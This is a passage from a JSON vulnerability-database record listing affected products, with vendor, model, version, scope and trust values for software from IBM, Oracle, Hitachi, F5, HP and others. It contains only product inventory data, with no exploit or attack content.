"model": "raplication manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"model": "big-ip edge gateway hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.06"
},
{
"model": "portal",
"scope": "eq",
"trust": 0.3,
"vendor": "liferay",
"version": "6.2.1"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.02"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.1"
},
{
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0"
},
{
"model": "xp7 global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.0-02"
},
{
"model": "secure analytics 2014.2r2",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.01"
},
{
"model": "big-ip webaccelerator hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.09"
},
{
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.21"
},
{
"model": "raplication manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.115"
},
{
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2"
},
{
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.19"
},
{
"model": "portal 6.2.1-ce-ga2-securit",
"scope": null,
"trust": 0.3,
"vendor": "liferay",
"version": null
},
{
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.3.0-00"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.2"
},
{
"model": "big-ip edge gateway hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.21.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "struts",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": "2.3.16.2"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.25"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.4"
},
{
"model": "leads",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.2.0"
},
{
"model": "infosphere balanced warehouse d5100",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "security threat response manager 2013.2r8",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.2"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.3"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.08"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "15.2"
},
{
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.401"
},
{
"model": "big-ip webaccelerator hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.0"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0-00"
},
{
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.3"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.6.1"
},
{
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.2"
},
{
"model": "enterprise server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"model": "raplication manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0.1.0"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3.0"
},
{
"model": "security siteprotector system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"model": "infosphere mashuphub",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.04"
},
{
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"model": "raplication manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "global link manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-11-07"
},
{
"model": "big-ip edge gateway hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "security siteprotector system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1"
},
{
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-06"
},
{
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "5.5"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.01"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.22"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.5.0-02"
},
{
"model": "weblogic portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.6.0"
},
{
"model": "retail clearance optimization engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.0"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"model": "sitescope monitors 11.32ip1",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.1.1"
},
{
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.13"
},
{
"model": "enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"model": "tiered storage manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.11"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"model": "tuning manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.2"
},
{
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.22"
},
{
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.1"
},
{
"model": "business server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "1x8664"
},
{
"model": "infosphere balanced warehouse c3000",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.4.1"
},
{
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1.1"
},
{
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"model": "tivoli composite application manager for application diagnostics",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.12"
},
{
"model": "contact optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "device manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.11"
},
{
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "content collector",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.1-06"
},
{
"model": "content analytics with enterprise search",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"model": "icewall configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "3.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.02"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.1.1"
},
{
"model": "enterprise data quality",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.0.11"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.1"
},
{
"model": "tivoli netcool/omnibus web gui",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3.1"
},
{
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"model": "tiered storage manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"model": "xp7 global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.51"
},
{
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"model": "tuning manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"model": "tiered storage manager software -00",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.1"
},
{
"model": "weblogic portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.1.0"
},
{
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1"
},
{
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-03(x64))"
},
{
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "20500"
},
{
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "records manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0.1"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00-03"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1"
},
{
"model": "tuning manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "tivoli storage manager administration center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.2"
},
{
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-00(x64))"
},
{
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-01"
},
{
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.1"
},
{
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.2"
},
{
"model": "websphere enterprise service bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.2"
},
{
"model": "infosphere master data management collaborative edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "-10.1"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.2.0"
},
{
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.3"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0.1.1"
},
{
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1.2"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-06"
},
{
"model": "omnifind enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.10"
},
{
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "57100"
},
{
"model": "big-ip webaccelerator hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.114"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4.1"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.1.1"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1"
},
{
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.5.0-02"
},
{
"model": "openpages grc platform",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.2.1"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-10-03"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2"
},
{
"model": "security identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.5"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"model": "device manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"model": "sitescope monitors",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.20"
},
{
"model": "secure analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2012.1"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.1"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.52"
},
{
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00-02"
},
{
"model": "content manager records enabler",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"model": "retail invoice matching 12.0in",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.4"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1"
},
{
"model": "infosphere master data management server for product information",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-02(x64))"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.6"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0.1"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.1"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "rational insight ifix1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.1"
},
{
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "jboss fuse",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6.1.0"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "websphere partner gateway enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.2"
},
{
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.3"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.53"
},
{
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.34"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.1"
},
{
"model": "global link manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.4"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.1.0"
},
{
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.4"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "centos",
"scope": "eq",
"trust": 0.3,
"vendor": "centos",
"version": "5"
},
{
"model": "websphere enterprise service bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.001"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.2143"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0"
},
{
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.12"
},
{
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.402"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-50"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.1-06"
},
{
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
